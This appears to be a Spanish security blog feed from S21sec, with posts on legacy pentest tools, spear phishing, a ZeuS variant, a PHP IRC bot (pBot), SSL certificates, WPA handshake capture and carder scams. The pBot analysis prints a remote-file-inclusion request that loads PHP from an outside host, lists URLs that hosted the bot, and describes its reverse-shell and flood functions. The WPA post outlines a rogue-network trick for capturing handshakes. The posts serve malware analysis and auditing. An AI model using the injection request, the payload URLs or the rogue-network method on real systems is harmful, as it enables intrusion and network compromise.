    Cuando ya llevas un tiempo dedicándote al tema del pentesting, una parte importante de las tareas las ejecutas con herramientas que la comunidad va publicando, tú mismo vas renovando herramientas, basándote sobre todo en novedades en las cuales ves reflejado un ahorro de tiempo o automatización o porque técnicamente mejoran los resultados.

    Sin embargo, hay una categoría de herramientas que es como el bote ese de tornillos y destornilladores que tienes en casa y que aunque compres nuevos no tiras o como cuando tu madre abre la caja metálica de galletas danesas y te la encuentras llena de botones.

    Herramientas que hacen lo que tienen que hacer de manera eficiente y que seguramente están o descontinuadas o se actualizan una vez cada milenios, oxidadas, en algunos casos rotas o incluso que para compilarlas de nuevo tienes que hacer arqueología de librerías.

    - Sqlibf (http://www.open-labs.org/)
    Empiezo con quizás el mejor detector de inyecciones SQL de la historia (es que es del compañero Pinuaga), si no me equivoco la única herramienta automática que detecta inyecciones SQL a ciegas por concatenación de pipes en Oracle. Sirvió de inspiración para la siguiente herramienta, el Proxystrike, también genial. Seguramente el Sqlmap haya superado como herramienta al Sqlibf, pero lo ligero de la herramienta sigue haciéndola imprescindible.
     
    - Proxystrike (http://code.google.com/p/proxystrike/)
    De nuestro ex Carlos del Ojo. Si! el Burpproxy es el mejor y el más útil, pero esta tiene un gran merito, aparte de usar un port del Sqlibf para detectar inyecciones, tenía la opción de la modularidad y la posibilidad de hacerle plugins.

    - Tcptraceroute, Netcat, Hping y Packit
    No deberían estar en la lista, por estar ya medio difuntas, pero claro, en otros tiempos, los tiempos del Nmap, de los firewalls, de los Netcat, etc., estas eran algunas de las herramientas de red que se usaban, aun cuando de pronto detectas un firewall mal configurado, vale la pena desempolvarlas y darles buen uso.

    - Theharvester (https://code.google.com/p/theharvester/)
    Ahora que parece que todo el mundo quiere rascar de OSINT para detectar información pública de objetivos tirando del omnipotente MALTEGO, o de la omnipresente FOCA, sigue gustándome más aquellas herramientas que te dan lo que necesitas y punto, esta es una de ellas junto con el Webslayer, de uno de los ex con más talento de S21Sec, el compi Martorella. Probad a comparar Theharvester con herramientas de rabiosa actualidad como por ejemplo Spiderfoot.

    - Fierce.pl (http://ha.ckers.org/fierce/)
    A estas alturas el Selvi ya habrá comentado que con el Metasploit puede hacer todo lo que hacen estas herramientas y mas, así que para cargarle aun mas ahí va esta otra, del maestro Rsnake, otra de esas que hace lo que tiene que hacer y te da lo que necesitas.

    - Yersinia (http://www.yersinia.net/)
    Otra histórica que aun no ha sido superada, una pequeña obra de arte de Alfredo Andrés (Slayer) y David Barroso.

    - Stunnel 3.26 (https://www.stunnel.org/index.html)
    Esta es de esas que actualizan la herramienta, pero a uno le sigue gustando mas la anterior.

    - Superscan4 (http://www.mcafee.com/us/downloads/free-tools/superscan.aspx )
    Con la compra de Foundstone por parte de Mcafee las viejas herramientas gratis de Foundstone quedaron sin continuidad. Aun así, esta es una de esas que bueno vale la pena tenerla por ahí.

    - Sysinternals (http://www.sysinternals.com)
    Si, se siguen continuando, sigue el desarrollo, se actualizan, etc. No deberían estar en esta lista, pero quizás el rollo romántico de código libre que tenían antes lo han perdido.

    - Sqlping3 (http://www.sqlsecurity.com/downloads) y Oscanner (http://www.cqure.net/wp/tools/database/oscanner/)
    Otras de las que Selvi diría que tiene su alternativa Metasploit, pero aun así, en un pentest interno siempre está bien llevarlas.

    - Ophcrack (http://ophcrack.sourceforge.net/)
    Algo tiene que tener de bueno que cuando la instalas en un equipo el antivirus la borra, parte del arsenal de crackeo de contraseñas de Windows, lleva descontinuada desde el 2009, y seguramente usar alternativas como Findmyhash de Julio Gómez sea infinitamente más rápido, pero sigue teniendo potencia.

    Seguramente ponerse en plan “abuelo cebolleta” es contraproducente en estos momentos de excelencia técnica, pero también es cierto que estas herramientas en muchos casos no tienen una alternativa directa más allá del Metasploit.

    ¿Tenéis alguna “histórica” que no hayamos mencionado?

    Dept. ACSS S21SEC



    Publicada el 7 June 2013 | Fri, 07 Jun 2013 07:23:00 -0400

    Spotify en ingresos frente al CD

    En Blogoff Juan hace unos cuantos números a partir de la poco transparente información de la industria de la música, comparando ingresos por escuchas en Spotify frente a las que obtienen por ventas de CDs, Amaia Montero gana por disco vendido 0,48 euros (4% del precio final). Amaia gana por cada escucha del disco en [...]

    La entrada Spotify en ingresos frente al CD aparece primero en Error 500.

    historias relacionadas



    Publicada el 6 June 2013 | Thu, 06 Jun 2013 16:41:58 -0400

    Defender al libro de Amazon

    Dos artículos – fesja, El blog salmón – sobre los planes de la ministra de cultura francesa contra Amazon para defender “el libro, la cultura, las librerías, la especificidad del tratamiento de los servicios culturales” que recogía El País. Ambos comparten el diagnóstico de que defender el libro y la cultura no está ligado inexorablemente [...]

    La entrada Defender al libro de Amazon aparece primero en Error 500.

    historias relacionadas



    Publicada el 6 June 2013 | Thu, 06 Jun 2013 16:25:43 -0400

    ¿Cuánto puede saber el gobierno con los datos sobre tus llamadas?

    Esa es la pregunta que creo que toca hacerse – ¿Cuánto puede saber el gobierno con los datos sobre tus llamadas? – a la luz de la revelación por parte de The Guardian de que la NSA estadounidense obtiene de Verizon la información sobre las llamadas de sus clientes. No se trata de las conversaciones [...]

    La entrada ¿Cuánto puede saber el gobierno con los datos sobre tus llamadas? aparece primero en Error 500.

    historias relacionadas



    Publicada el 6 June 2013 | Thu, 06 Jun 2013 11:17:38 -0400

    Sony Vaio Pro 13, Sony Vaio Duo 13

    Hoy he estado en la presentación de la gama nueva de Sony Vaio – con la que hemos inaugurado la nueva página de directos de Xataka – y mis impresiones han pivotado entre las muy buenas respecto al Sony Vaio Pro 13 y la tibieza para con el Sony Vaio Duo 13 Vaio Pro 13: [...]

    La entrada Sony Vaio Pro 13, Sony Vaio Duo 13 aparece primero en Error 500.

    historias relacionadas



    Publicada el 5 June 2013 | Wed, 05 Jun 2013 17:10:04 -0400

    El gobierno de Estados Unidos contra los “trolls de las patentes” software

    En Eff.org recogen las medidas propuestas desde la casa blanca para luchar contra los “trolls de las patentes software”. Es un tema del llevamos años hablando y que se ha convertido en una verdadera amenaza a la innovación. A bote pronto las acciones y propuestas de leyes suenan bien, pero dejan de lado el debate [...]

    La entrada El gobierno de Estados Unidos contra los “trolls de las patentes” software aparece primero en Error 500.

    historias relacionadas



    Publicada el 5 June 2013 | Wed, 05 Jun 2013 16:50:35 -0400

    ¿Cuál es el mejor momento para publicar en blogs y compartir en redes sociales?

    Según Matt McGee no existe mejor momento para publicar en blogs y compartir en redes sociales y lo justifica: se analiza a partir de audiencias generales y no la particular del emisor, si todos publican a esa “mejor hora” dejará de serlo por saturación y es imposible sustraer la variable de calidad del momento como [...]

    La entrada ¿Cuál es el mejor momento para publicar en blogs y compartir en redes sociales? aparece primero en Error 500.

    historias relacionadas



    Publicada el 5 June 2013 | Wed, 05 Jun 2013 10:09:07 -0400

    Kickstarter: más arte menos cacharros sin prototipo

    Un buen análisis en Quartz sobre las nuevas reglas de Kickstarter – que uno sigue pensando como una de las compañías más importantes de los últimos años – y cómo reflejan su vocación de sitio de crowdfunding para proyectos de arte mientras marcan distancia con los enfocados a gadgets de los que no hay siquiera [...]

    La entrada Kickstarter: más arte menos cacharros sin prototipo aparece primero en Error 500.

    historias relacionadas



    Publicada el 4 June 2013 | Tue, 04 Jun 2013 16:38:42 -0400

    Los planes de Feedly ante su oportunidad

    El cierre de Google Reader me llevó, como a tantos, a probar alternativas y ahí estoy intentándolo con Feedly. Ahora que mi patrón de lectura a través de RSS es más bien irregular, aunque entiendo las razones del roadmap que acaban de anunciar, lo que más echo en falta es más ayuda para descubrir y [...]

    La entrada Los planes de Feedly ante su oportunidad aparece primero en Error 500.



    Publicada el 4 June 2013 | Tue, 04 Jun 2013 14:29:53 -0400

    Glosario de términos: ¿Qué es el Spear Phishing?

    Ya hemos hablado varias veces sobre el Spear Phishing, pero hoy queremos dedicar este post, para explicar más en profundidad este tipo de ataques. Últimamente es una de las modalidades de ataque cibernético más utilizado tal y como se ha podido comprobar en el ataque a activistas de derechos políticos en China o los realizados a altos cargos de empresas relacionadas con la industria aeroespacial y de defensa del gobierno de Estados Unidos, empleados del Banco Central Australiano, a cuentas de Twitter y  a Google.

    ¿Qué es el Spear Phishing?

    Es una variante del phishing y consiste en el envío de mensajes, generalmente por correo electrónico, específicos y personalizados a un grupo de personas determinado. Esta es la principal diferencia respecto al phishing tradicional por email, que consistía en el envío de un mismo correo electrónico de forma masiva y al azar a millones de usuarios.

    El medio de distribución más utilizado es el mismo en ambos casos, el correo electrónico. Se envía un correo supuestamente legítimo con una invitación para abrir un archivo adjunto que contiene un malware, un enlace que dirige a una página para la descarga de un programa malicioso o un enlace que dirige a un formulario con el objetivo de obtener información confidencial.

    Con el envío de mensajes específicos, para los que previamente se suele haber realizado una búsqueda de información del objetivo, a un grupo limitado de usuarios seleccionados expresamente, generalmente de una misma empresa e incluso de un departamento en concreto, y con información muy precisa y personalizada se persigue obtener habitualmente:

    • Información altamente confidencial propia de la organización.
    • Datos de clientes, información bancaria, etc.
    • Información de otras organizaciones con las que trata la organización víctima.
    El éxito de esta técnica se basa en:
    • Es todavía un tipo de ataque desconocido por el público no especializado.
    • Al ser una variante con alto componente de ingeniería social es difícil de detectar por los tradicionales métodos antiphishing.
    La solución a este tipo de ataques no es sencilla debido a su gran variabilidad en cuanto contenido del mensaje, cuáles son las personas objetivo, qué vulnerabilidad se intenta explotar, etc. por lo que incluso disponiendo de las mejores tecnologías de seguridad implantadas, un ataque de Spear Phishing puede resultar satisfactorio.

    Por tanto, la solución más exitosa para este tipo de ataques y muchos otros con alto componente de ingeniería social, resultará de la prevención mediante campañas de formación y concienciación periódicas que permitan mantener informados a los empleados de la organización sobre los nuevos casos de Spear Phishing, las actualizaciones de seguridad, vulnerabilidades, malware, etc. forjando así una cultura de seguridad global para toda la organización.

    Govardhan Ghanshyam
    S21sec Institute

    Publicada el 28 May 2013 | Tue, 28 May 2013 04:17:00 -0400

    Jornadas Red Más Segura, promoviendo el uso seguro de las TIC

    El pasado 18 de mayo, Juan Carlos Rodriguez, Responsable de Formación de S21sec, tuvo el placer de participar en la primera edición de las jornadas Red Más Segura que se celebraron los días 17 y 18 de mayo en Madrid.

    Las jornadas Red Más Segura nacen en 2013 con el propósito de promover a través de un foro, el uso de Internet de una manera confiable y segura. El objetivo principal de estas jornadas era hacer llegar a todos los públicos independientemente de sus conocimientos técnicos en informática, el uso adecuado y responsable de los recursos disponibles en la red con el fin de evitar ser víctimas de abusos fraudulentos, estafas, acoso, grooming y otros tantos problemas que cualquier navegante puede sufrir en Internet si no cuenta con unos conocimientos adecuados.

    En este sentido, Juan Carlos Rodriguez, dió una ponencia bajo el título "Seguridad en Dispositivos Móviles, Consolas y Smart TV" e informó a los asistentes sobre el correcto uso que debemos dar a nuestros dispositivos móviles: Cómo protegernos de la pérdida o robo de un dispositivo móvil, cómo proteger la información que contiene, las principales amenazas que les afectan, cómo conectarnos de forma segura a una red wifi etc.

    Aprovechamos la ocasión para felicitar a la organización que ha hecho posible la creación y el desarrollo de estas jornadas así como a todos los ponentes y asistentes que participaron en ellas. Desde S21sec, esperamos participar en las próximas ediciones y promover el uso seguro de las TIC a todos los niveles.

    Ya se encuentran disponibles las presentaciones de las jornadas en la web de X1 Red Más Segura.

    Dpto. Marketing S21sec

    Publicada el 24 May 2013 | Fri, 24 May 2013 06:59:00 -0400

    Infografía: Distribución de Malware por Países


    Hoy, día de internet, queremos compartir con vosotros, esta infografía que hemos realizado con los datos extraídos de Malware Domain list
    En la imagen, podemos ver que Estados Unidos sigue siendo el mayor foco de malware del mundo, con un 26% del tráfico mundial, seguido por Ucrania (12%), Rusia (9%) y China (8%). Respecto al malware, Zeus encabeza el Top 5 de programas maliciosos con un 59% de los incidentes, seguido a cierta distancia de Blackhole (20%) y Phoenix (11%). 
    Y es que, el malware se multiplica cada año y las empresas dedicadas a la ciberseguridad hemos de trabajar constantemente para encontrar nuevas soluciones que lo frenen. 

    FELIZ DÍA DE INTERNET DE PARTE DE TODO EL EQUIPO DE S21sec

    infografia mapa malware ciberseguridad


    Publicada el 17 May 2013 | Fri, 17 May 2013 09:00:00 -0400

    ¿Probando tu variante de ZeuS?


    Ya hace un tiempo que se filtró el código fuente de ZeuS, y hemos visto variantes como Ice-IX o Citadel siendo usados de manera masiva, pero de cuando en cuando seguimos encontrando alguna muestra basada en este código filtrado.

    En este caso, nos hemos topado con una muestra usada como prueba, una prueba bastante reciente ya que la fecha de compilación del binario desempaquetado indica el 9 de abril.

    Es curioso ver cómo envía información de debug a un servidor que ha sido "hardcodeado", y cuyo path es "/test/debug.php". Por ejemplo, una vez infectado, vemos como cifra esta información con RC4:

    [16:59:13] TC=0000000008, PID=0448(0x01C0), TID=1324(0x052C), LE=0(0x0), F=initUserData, FL=C:\Zeus projects\last\bot_chela_antirapport_with_x (512)..INFO: coreData.currentUser.id="0x2053D9C1", coreData.currentUser.sessionId="0"
    Este troyano añade algunas funcionalidades no presentes en ZeuS, como pueden ser la detección de sandbox, de software antivirus o software antimalware. Por ejemplo, es capaz detectar el uso de DeepFreeze o Wireshark, o alguna información "interna" de Sandboxie, Anubis o el sandbox Camas de Comodo. Los patrones buscados se encuentran cifrados (del mismo modo que el cifrado habitual de strings en ZeuS), pero las referencias a las deteciones no, y se puede intuir el comportamiento únicamente mirando a estos strings.

    Parece que tampoco quiere compartir la máquina con otro malware, y algunos strings indican que intenta limpiar otras infecciones, como pueden ser las de ZeusV2 o Spyeye:
        SpyEye Kill Mutex Name: %hs                                   
        SpyEye registry value: %s, path: %s                               

        SpyEyeRemove

        Zeus v2 deleted                             

        zeusV2Remove                                

        Zeus v2 deleted
    Por supuesto, el nombre del proyecto también es más que interesante ("zeus projects", "antirapport", "with x64", "chela"??):
    C:\Zeus projects\last\bot_chela_antirapport_with_x64\source\client\...
    Otro ejemplo claro de comentarios que nos indican el comportamiento lo encontramos en lo referente a la interacción con el firewall de windows (windowsfirewall.cpp):
    WindowsFirewall::FirewallAddExclusions"
    "Added exclusion for %s"

    "Exclusion for %s is re-enabled"

    "Exclusion for %s is already in the list"

    "Firewall DONE"
    Y hay muchos más:
    In IE!
    I'm a installer.                                   

    I'm a loader. 

    Current process started from system account. Installing to all users.

    Malware report to server: %d                                   

    MalwareDelete::_removeAll 

    Accepted client connection.                                    

    Accepted new conection from bot (BotID: %s, IP: %s).                               
    Accepted new conection from client (IP: %s), but bot not connected! Disconnecting client!

    ...
      
    Nada más que decir, solo dar las gracias al desarrollador por (al menos por esta vez) hacer nuestro trabajo un poco más sencillo ;)

    Mikel Gastesi
    S21sec ecrime

    Publicada el 17 May 2013 | Fri, 17 May 2013 03:46:00 -0400

    S21sec participará en las jornadas X1 RED MÁS SEGURA

    El próximo 18 de mayo S21sec participará en las jornadas "X1 Red Más Segura" que se celebrarán en Madrid y que tienen como propósito promover el uso de Internet de una manera confiable y segura.

    Su objetivo es hacer llegar a todos lo públicos el uso adecuado y responsable de los recursos disponibles en la red con el fin de evitar ser víctimas de abusos fraudulentos, estafas, acoso, grooming y tantos otros problemas que cualquier navegante puede sufrir en Internet si no cuenta con unos conocimientos adecuados.

    Para esta labor, las Jornadas cuentan con un cartel de profesionales de la Seguridad Informática y el Hacking Ético consagrados, que mostrarán las verdades de la red y brindarán consejos de gran utilidad que todo navegante debería conocer.

    En este sentido, Juan Carlos Rodriguez, responsable de formación de S21sec dará una ponencia bajo el título Seguridad en el acceso a Internet desde dispositivos móviles, consolas y Smart - TV.

    Dpto.Marketing S21sec

    Publicada el 10 May 2013 | Fri, 10 May 2013 03:52:00 -0400

    Análisis de la evolución de un bot (PBOT): Parte I


    En los últimos días, hemos visto la evolución de un bot, al que llamaremos: PBOT
    En primer lugar se ha observado que mediante una vulnerabilidad de PHP, en la que se intenta inyectar código a través de la variable _SERVER[DOCUMENT_ROOT], asignándole una URL en la que recogerá los datos.
    • GET/path/?_SERVER[DOCUMENT_ROOT]=http://url.com/path/archivoPHPmalicioso??   HTTP/1.1

    Cómo archivos maliciosos nos hemos encontrado diversos casos, en lo que parece ser la evolución del mismo script. 
    • http://flosser-adler.de/phpMyAdmin/LICENSE
    • http://goldstudio.zz.mu/index/links.gif
    • http://console-toi.fr/wp-includes/images/id.gif 

    En el primero de los casos, hemos observado claramente que se trata de un archivo PHP.  


    Funcionalidades de pBot

    Cómo se puede observar en la evidencia, este programa se trata de un "bot" y que dispone de ciertas funcionalidades, a parte de las evidentes de conexión y desconexión del bot al servidor, de otras destinadas a realizar un ataque, como por ejemplo:
    • Envío de Mails
    • Ejecución de comandos
    • Ejecución de un código php proporcionado
    • Realizar ataques de tcpflood/udpflood
    • Escaneo de puertos
    • Conexión inversa con una shell

    Este bot se conecta a un canal de IRC, para poder recibir los comandos, aunque también disponga de la funcionalidad para realizar una conexión inversa, con la que disponer de una shell directamente. Cómo se puede observar en las variables de configuración de dicho bot, se encuentran los servidores a los que realizar la conexión, canales, e incluso los credenciales que se utilizarán para la conexión (tanto con el bot, como con el server IRC). 


    Variables de configuración de pBot

    Se puede observar que aún se encuentra en desarrollo, puesto que hay algunas partes del código comentadas. A continuación, analizaremos aquellas funciones más importantes. Al final de todo del script, se puede observar como crea un objeto de la clase pBot, y a continuación lanza la función "start()", por lo que empezaremos por esta:
    Función START()

    Para empezar, esta función crea una conexión a los servidores establecidos en la configuración mediante la función "fsockopen" de php. A continuación crea un identificador para el bot, concatenando el texto obtenido de "config[idetmms]" y un máximo de 3 números aleatorios. Por último, antes de llamar a la función main, se autentica contra el servidor con el que ha establecido la conexión.
    Antes de analizar la función principal (main) analizaremos las otras dos funciones que tienen algo de "jugo", puesto que la función main, es algo extensa.

    Las funciones udpflood y tcpflood actúan de forma similar. En primer lugar, notifican mediante el canal establecido en "chan", que el ataque de udpflood/tcpflood comienza, y a continuación, crean un paquete con contenido aleatorio, que envían durante un cierto número de veces (en un principio en udp durante un tiempo especificado como parámetro, en el caso de tcp un número de veces establecidas por parámetro) creando distintas conexiones para llegar a saturar el servidor/servicio. 

     Función UDPFLOOD()

    Función TCPFLOOD()

    A la siguiente función "conback", se le proporcionan dos parámetros, que son una IP y un puerto (estos se usarán para realizar la conexión inversa). En primer lugar, escribe en el canal de IRC, que intenta realizar la conexión a la IP y puerto proporcionados. A continuación, comprueba si es posible escribir en "/tmp/ para volcar el contenido de una variable (en esta primera versión se encuentra comentada, por eso parece estar el script en desarrollo) dentro de un archivo llamado "dc.pl", previa decodificación en base64 de ésta. A continuación, intenta ejecutar el archivo creado para que este realice la conexión a la IP especificada y pueda proveerle una shell. Por último al acabar la ejecución de éste, intenta borrar el archivo para no dejar evidencias.
    Función CONBACK()

    Existen otras funciones dentro de este bot, pero que básicamente son órdenes o mensajes básicos para el canal de IRC, como establecer el nickname (en este caso, identificando el tipo de servidor comprometido), unirse a un canal, enviar un mensaje privado, etc.
    En el siguiente artículo, se analizará la función principal de éste así como la generación del archivo dc.pl por parte de la función "conback()".


    Abel Gómez Águila
    Dpto. ACSS S21SEC

    Publicada el 16 April 2013 | Tue, 16 Apr 2013 05:39:00 -0400

    Análisis de los certificados SSL de los sitios más populares

    Recordaréis que hace unas semanas estuvimos descargando los certificados SSL del millón de sitios más populares según Alexa.
    De este proceso obtuvimos una lista de 419218 sitios que negociaban correctamente SSL y nos devolvían un certificado que nos pusimos a analizar.

    La primera pregunta que se nos ocurrió fue: ¿Cuántos de estos certificados son validos? ¿Cuántos de estos sitios nos van a mostrar bien el candadito en el navegador?

    La respuesta no es fácil, ya que nos enfrentamos a una serie de problemas:
    - El conjunto de entidades de certificación reconocidas no es igual para todos los sistemas.
    - Hay sitios que tienen varios nombres DNS de forma que no todos corresponden con el sujeto del certificado.
    - Los criterios de seguridad de los distintos navegadores no son iguales.

    Si utilizamos las entidades reconocidas por Firefox para validar los certificados y obviamos la resolución DNS y los criterios de seguridad de cada navegador, obtenemos los siguientes resultados:


    Si descartamos los certificados que utilizan un algoritmo de firma vulnerable (md2, md2WithRSAEncryption, md4, md4WithRSAEncryption, md5, md5WithRSAEncryption, md5WithRSASignature y ripemd128) tenemos los siguientes resultados:


    Y si además discriminamos según el tamaño de llave utilizado tenemos esto:


    En general el estado de salud de los certificados analizados no es bueno. Un gran número de ellos son claramente inválidos y no realizan una de sus funciones principales, la de garantizar la identidad del servidor.

    También se mantienen un número considerable de certificados que utilizan MD5 como algoritmo de firma a pesar de que desde hace años se recomienda el evitar su uso. Y por último, el número de certificados con llaves inferiores a 2048 bits sigue siendo muy alto, incluso quedan algunos con llaves de 512.

    Ramón Pinuaga
    Dpto. ACSS S21SEC

    Publicada el 26 March 2013 | Tue, 26 Mar 2013 13:15:00 -0400

    Capturando facilmente un handshake WPA

    Se ha hablado mucho de las auditorías en redes wireless. A día de hoy cualquiera pueda conseguir la clave de una red wireless. De hecho existen procesos automatizados que ya realizan todo el proceso completo, como es el caso del script de wifite. Pero hoy no hablaremos de eso.

    Antes de empezar con el proceso de captura del handshake y por si no estás familiarizado con el tema, os dejo un gráfico que lo explica muy bien.

    Imagen original
    Cuando se está auditando una red WPA o WPA2, no basta con conseguir muchos paquetes DATA, lo que se necesita capturar es el handshake, y este paquete solo se consigue desautenticando a un cliente legítimo de la red, y cuando se vuelve a conectar con airodump-ng, una herramienta de la suite aircrack-ng capturaremos dicho fichero semilla.

    En el artículo de hoy veremos cómo conseguir un handshake fácilmente, viendo qué tipo de red demanda un cliente.

    Primero con airodump-ng miraremos qué redes hay disponibles.


    Activamos la interfaz en modo monitor y vemos tanto las redes disponibles, como las que demandan los clientes.


    Nos nos fijaremos en este caso en las redes disponibles. Nos iremos al  apartado de abajo, si nos fijamos la MAC que acaba en 55 está solicitando gran cantidad de redes.

    Otra de las MAC, la que acaba en D3, está también solicitando una red. Estas redes son las que el portátil/smartphone tiene configuradas y preguntará por estas redes.
    Es por eso que prepararemos una pequeña trampa para el usuario nos facilite el handshake de la red. Para eso usaremos un script de Digininja.
    Lo que haremos será crear diferentes redes con distintos cifrados. El usuario al detectar que hay una red como la que él tiene configurada, se intentará autenticar contra dicha red será entonces cuando capturemos el handshake.

    ¿Qué tiene de interesante este método?

    Que no necesitamos estar cerca de la red de la que queremos conseguir el handshake, ya que, conociendo la red y viendo que tenemos al usuario cerca y que la está pidiendo, con eso ya podremos capturar el fichero semilla que necesitamos.
    Bajamos y le damos permiso al script de DigiNinja


    El uso del script es muy sencillo, sólo tendremos que darle el nombre de la red.


    Wifi Honey se encargará de crear los distintos ESSID.



    Cuando el cliente se conecte a uno de nuestros ESSID's conseguiremos el handshake de la red.


    Si miráis la imagen arriba a la derecha, nos indica que hemos capturado el handshake.
    Ahora sólo tendremos que hacer la parte del crackeo Offline.

    WifiHoney es una solución para conseguir un handshake muy fácilmente, no tendremos ni que desautenticar al cliente, él mismo nos dará la clave de la red.

    Marc Rivero López
    S21sec ACSS
    (blog/twitter)

    Publicada el 11 March 2013 | Mon, 11 Mar 2013 05:24:00 -0400

    Seguridad WiFi: Mas allá de los 2400 MHz

    El conocido como WiFi es una marca de la Wi-Fi Alliance, organización comercial que adopta, prueba y certifica que los equipos cumplen los estándares 802.11. El enorme éxito de tecnologías como 802.11b/g ya llevado a WiFi a convertirse en un término genérico sinónimo de red local inalámbrica. Estas tecnologías tienen como principal característica el trabajar en la banda de frecuencias de 2.4Ghz, conocida como banda libre, aunque una denominación mas técnicamente correcta sería la de asignación ISM (Industrial, Scientific and Medical). Estas son las bandas reservadas internacionalmente para uso no comercial de radiofrecuencia electromagnética en áreas industrial, científica y médica. Estas asignaciones no tienen que ser necesariamente de equipos de comunicaciones si no que también se emplean en otros usos, siendo el ejemplos cercanos los hornos microondas, mandos remotos por radio, etc.

    El uso de estas bandas de frecuencia está abierto a cualquier uso sin necesidad de licencia, siempre que se haga respetando las regulaciones de parámetros técnicos y limites de potencia radiada. Esto ha permitido la popularización de hardware de bajo coste que emplea estas bandas, pero también supone la necesidad de convivir con otros emisores y por tanto a aceptar cierto nivel de interferencia mutua.

    La consecuencia es que el espectro normalmente usado para los típicos canales WiFi 1 a 14, entre 2400 a 2484 MHz, se encuentre actualmente saturado. Principalmente por redes WiFi pero también por otros dispositivos como cámaras inalámbricas analógicas o vigila-bebes especialmente en las grandes ciudades. Esto ha supuesto que las nuevas generaciones de redes WiFI y otros sistemas de redes inalámbricas están derivando hacia el uso de nuevas partes del espectro, tanto de uso libre como de aquel que requiere licencia.

    El principal ejemplo lo tenemos en 802.11n  la versión más actual de las redes wireless que permite como opción el funcionamiento dual  dentro de 2.4/5Ghz. Caso similar a  802.11ac considerado el futuro de la WiFi: Este estándar abandona la banda de 2.4Ghz ante la imposibilidad de encajar sus velocidades Gigabit pues el  espacio requerido por un solo canal prácticamente supera toda la asignación en dicha banda. La tendencia al uso de otras bandas también es una práctica habitual en los fabricantes de equipos de enlace wireless “carrier class” para aplicaciones punto a punto que ofrecen sus productos en también en ciertos segmentos dentro de las bandas de 900Mhz, 2.3Ghz, 3Ghz, 10Ghz y 24Ghz. A los que habría que añadir las soluciones Wimax en 2,5 y 3,5 GHz.

    El uso de redes inalámbricas también ha alcanzado usos mas allá del los ámbitos residencial y empresarial.  Por ejemplo están surgiendo sistemas  que emplean redes wireless para suministrar accesos de banda ancha en aplicaciones especificas en el ámbito de la seguridad pública, en EEUU existe una asignación especifica en 4.9Ghz para redes inalámbricas usadas por organismos de seguridad y emergencias. Siguiendo estos pasos existe una asignación de espacio radioeléctrico similar a nivel europeo, mediante la correspondiente recomendación CEPT,  para los sistemas de banda ancha usados en situaciones catastróficas. Conocidos por las siglas BBDR de sus iniciales en inglés, Broad Band Disaster Relief.

    Otras adaptaciones de las redes inalámbricas tradicionales son las comunicaciones de los sistemas de transporte inteligentes  diseñadas para proporcionar información y seguridad en el transporte por carretera, también conocidos como comunicaciones  Car2Car. Estos sistemas actualmente en desarrollo emplearan frecuencias cercanas a los 6Ghz, las tecnologías como WAVE (Wireless Access for the Vehicular Environment) hacen uso del standard IEEE 802.11q que no deja de ser una transformación para estos usos de las redes WiFi tradicionales, como manifiesta el hecho de pertenecer a la familia 802.11.

    No es por tanto aventurado concluir que los tiempos en los que un pentester podía enfrentar  una auditoria wireless con únicamente una tarjeta de red 802.11b/g que incorporara un chipset que permitiera los modos monitor y la inyección de tráfico han pasado a la historia. Hoy por hoy  cualquier auditoria inalámbrica planteada de forma realista deberá incluir la identificación y estudio de todas aquellas redes inalámbricas cubiertas por el alcance definido para el proyecto en cuestión, independientemente de la tecnología concreta y la banda de frecuencias empleada.

    Miguel A. Hernández
    Advanced Cyber Security Services
    S21Sec

    Publicada el 25 February 2013 | Mon, 25 Feb 2013 03:56:00 -0500

    También hay estafas en el "underground"

    Si echáis un vistazo a cualquier manual de consejos infalibles para crear una tienda online exitosa, veréis cómo inevitablemente uno de ellos es ganar la confianza del cliente. Nuestro potencial comprador tiene que estar convencido de que puede introducir su número de tarjeta en nuestro formulario y al poco tiempo el producto llegará a su casa sin sorpresas desagradables. Y es que la confianza es todo un must en el mundo de las compras online, en las que el vendedor probablemente esté en la otra punta del mundo y podría esfumarse con nuestro dinero sin demasiados problemas.

    Si esto sucede en el comercio online legitimo, es fácil imaginarnos cómo es cuando las compras se producen entre gente, digamos, de moral relajada. Las estafas dentro de la escena underground constituyen un auténtico problema para los ciberdelicuentes que necesitan proveerse de material nuevo y se encuentran con una legión de estafadores dispuestos a vender números de tarjetas bloqueados, phishing kits "backdooreados" o servicios inexistentes. Estos carders que estafan a sus iguales se denominan "rippers" en el argot y el ecosistema under ha adoptado varias estrategias para solucionar su molesta presencia. La solución más extendida suele ser la expulsión  de la comunidad:  los foros suelen  contar  con  un hilo muy activo, donde se denuncia a los usuarios que han estafado a otro miembro del foro. Después de varias denuncias argumentadas, los administradores proceden a su expulsión permanente. Como ejemplo tenéis esta imagen del defenestrado foro carders.cc, en el momento del volcado de la base de datos este hilo contaba con 3.354 post y como podéis ver presentaba una intensa actividad diaria.  Por supuesto no sólo los usuarios pueden ser denunciados, también las tiendas que se anuncian en el foro pueden estar operadas por un ripper sin escrúpulos.




    Pero expulsar a las ovejas negras confirmadas no es suficiente, también hay que minimizar las posibilidades de encontrarte con una de ellas a la hora de hacer negocios y ahí entran los  sistema de reputación o confianza interna: estos pueden estar gestionados por los administradores o bien apoyados por la comunidad. En el primer caso, los vendedores tienen que enviar muestras de su material a los administradores, para que estos confirmen su autenticidad. Respecto a la segunda opción, algunos foros cuentan con sistemas tipo Itrader mediante el que los usuarios califican a los vendedores con votos positivos o negativos por cada transacción. Esta puntuación se refleja en  el  perfil del  usuario y ayuda a que otros miembros decidan a hacer negocios con él o no.



    Una vuelta de tuerca a esto último lo constituyen los sistemas de niveles: Algunos comunidades se estructuran en diferentes niveles, a los que los usuarios acceden según se  incrementa la confianza  en  ellos y demuestran su valía compartiendo información útil para la comunidad. Esta estrategia no solo sirve para mantener alejados a los rippers, sino que también es una de las muchas maniobras que emplean los ciberdelincuentes para hacer los foros más inaccesibles a fuerzas del orden y la industria de seguridad; pero ese tema mejor lo dejamos para otro post ;)

    Javier Barrios
    S21sec ecrime

    Publicada el 20 February 2013 | Wed, 20 Feb 2013 03:08:00 -0500

    ¿Me copias Internet en este disco? (edición SSL)

    Leyendo esta noticia en la que se comenta que la entidad de certificación TurkTrust emitió "por error" dos certificados de CA subordinada (con la capacidad de generar otros certificados validos sin control) en vez de certificados normales, se me ocurrió una idea:

    ¿Y si hay mas certificados de CA emitidos por error circulando por ahí?

    Así que le pregunte a mi colega imaginario Patxi: ¿Patxi, que te parece si nos bajamos todos los certificados de Internet y vemos si hay alguno vulnerable?
    Patxi: ¡Venga pues!

